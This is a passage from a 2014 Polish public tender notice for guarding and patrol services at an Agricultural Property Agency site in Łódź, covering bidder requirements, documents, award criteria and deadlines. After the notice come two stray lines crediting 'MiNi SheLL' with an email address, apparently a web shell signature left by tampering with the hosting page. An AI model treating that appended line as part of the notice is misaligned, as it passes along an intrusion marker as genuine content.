<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca dysponuje potencjałem technicznym niezbędnym do wykonania zamówienia, Wykonawca zobowiązany jest załączyć do oferty: a) w zakresie dysponowania potencjałem technicznym, Zamawiający nie precyzuje żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, Wykonawca zobowiązany jest załączyć do oferty:a) celem wykazania spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia, Wykonawca oświadcza że:- dysponuje lub będzie dysponował co najmniej 2 osobami zdolnymi do pełnienia służby dozoru/ochrony na obiekcie oraz co najmniej jedną dwuosobową grupą patrolowo - interwencyjną. Oświadczenie składane na formularzu załącznika numer 4 do SIWZ. 
- osoby wchodzące w skład w/w GPI oraz nadzorujące pracę osób pełniących  dozór  i  ochronę  nieruchomości posiadają  wymagane  kwalifikacje  oraz są wpisane  na  listę  kwalifikowanych  pracowników  ochrony  fizycznej  osób  i  mienia,  która  jest  prowadzona  przez  Komendanta  Głównego  Policji  oraz  że  te  osoby,  jak  również  osoby  wskazane  do  pełnienia  dozoru  i  ochrony mienia  bezpośrednio  na  obiekcie,  nie  są  karane. Oświadczenie składane na formularzu załącznika numer 4 do SIWZ. 
- osoby, które zostaną wyznaczone do wykonywania zadań ochronnych bezpośrednio na obiekcie są pełnosprawne i nie posiadają na dzień składania ofert orzeczenia o niepełnosprawności. Oświadczenie składane na formularzu załącznika numer 4 do SIWZ. 
- zatrudni co najmniej jedną osobę do uczestniczenia w wykonywaniu obowiązków ochronnych z rejestru bezrobotnych, zgodnie z warunkami wprowadzonymi klauzulą społeczną (o której mowa w Dziale III ust. 2 SIWZ). Oświadczenie składane na formularzu załącznika numer 4 do SIWZ.  Ocena spełniania wymaganych warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia, w oparciu o informacje zawarte w załączonych do oferty dokumentach i oświadczeniach, a które były wymagane przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie przedmiotu zamówienia - Wykonawca winien załączyć do oferty:a) ważną i opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 2 000 000 zł na jedno i wszystkie zdarzenia.Ocena spełniania wymaganych warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia, w oparciu o informacje zawarte w załączonych do oferty dokumentach i oświadczeniach, a które były wymagane przez Zamawiającego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty musi być załączone pełnomocnictwo, o ile prawo do podpisania umowy nie wynika z innych dokumentów złożonych wraz z ofertą. Przyjmuje się, że pełnomocnictwo do złożenia oferty upoważnia również do poświadczenia za zgodność z oryginałem kopii wszystkich dokumentów składanych wraz z ofertą, chyba, że z treści pełnomocnictwa wynika co innego. Pełnomocnictwo składa się w oryginale lub kopii poświadczonej za zgodność z oryginałem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - czas dojazdu grupy GPI - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę treści zawartej umowy w zakresie jej realizacji pod warunkiem, że: a) wystąpią czynniki zewnętrzne niezależne od Zamawiającego i Wykonawcy, które nie pozwalają na prawidłowe i terminowe wykonanie zamówienia (siła wyższa)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Warszawie Filia w Łodzi ul. Północna 27/29, 91-420 Łódź, województwo łódzkie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2014 godzina 09:30, miejsce: Agencja Nieruchomości Rolnych Oddział Terenowy w Warszawie Filia w Łodzi ul. Północna 27/29, 91-420 Łódź, województwo łódzkie, pokój 315 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com